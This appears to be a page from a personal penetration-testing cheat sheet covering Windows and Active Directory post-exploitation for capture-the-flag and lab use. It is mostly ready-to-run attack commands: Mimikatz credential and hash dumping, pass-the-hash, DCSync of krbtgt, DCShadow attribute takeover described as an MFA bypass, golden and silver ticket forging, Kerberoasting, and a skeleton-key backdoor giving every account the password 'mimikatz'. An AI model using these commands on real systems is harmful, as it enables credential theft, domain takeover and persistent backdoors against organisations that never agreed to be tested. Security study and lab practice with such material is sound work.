Exfiltration

Don't mis any data

Catch the Flag

Windows

dir "\proof*.txt" /s

PS> gci -recurse -inculde FILENAME*

Linux

find / -type f -iname "flag.txt" 2>/dev/null

Dump Active Directory with PS

[PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName

Dump with Mimikatz

ref: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

cheatsheet: https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

copy from: https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz

[Important to start first] Test Mimikatz

privilege::debug
# Privilege '20' OK => Working properly

Password / hashes

# dump logon users pass or ntlm hash
sekurlsa::logonpasswords

# dump hashes
lsadump:sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash>

Escalate privilege using NTLM Hash

ref: https://www.youtube.com/watch?v=NeY7OiQTRK8

# get NTLM hash of Administrator from `securlsa::logonpasswords


sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd

DCsync (Priviledge Escalation AD)

[requirement] user must have permission to domain:

  • Replication Directory Changes

  • Replication Directory Changes All

lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator

[recommended to start] Elevate shell integrity

# use when using evil-winrm, we get medium integrity shells
token::elevate

DCshadow

#simple poc
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow"

Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)

https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html

Use case:

  • Bypass MFA

# set update attribute
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"

# Power up other mimikatz shell to push
lsadump::dcshadow /push

Golden / Silver Ticket

# dump hash and SID
lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT] 

# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt

# check
misc::cmd
dir \\IP\c$ [/user:USER PASS]
PsExec.exe \\IP cmd.exe



# Kerberoasing attack 
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
kerberos::list /export
# download ticket in C:\kerberoast and crack with tgsrepcrack.py

Kerberos Skeleton key

Install backdoor to memory, and make all user can use same password "mimikatz".

note: if the machine was reboot, this backdoor can't exists.

misc::skeleton

# done, now accessing admin share
> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> dir \\Desktop-1\c$ /user:Machine1 mimikatz

Get DNS Zone

cd C:\Windows
PS> gci -recurse -inculde <DOMAIN>*

Online request server: https://beeceptor.com/

PreviousTransfer FileNextWiFi Pentesting

Last updated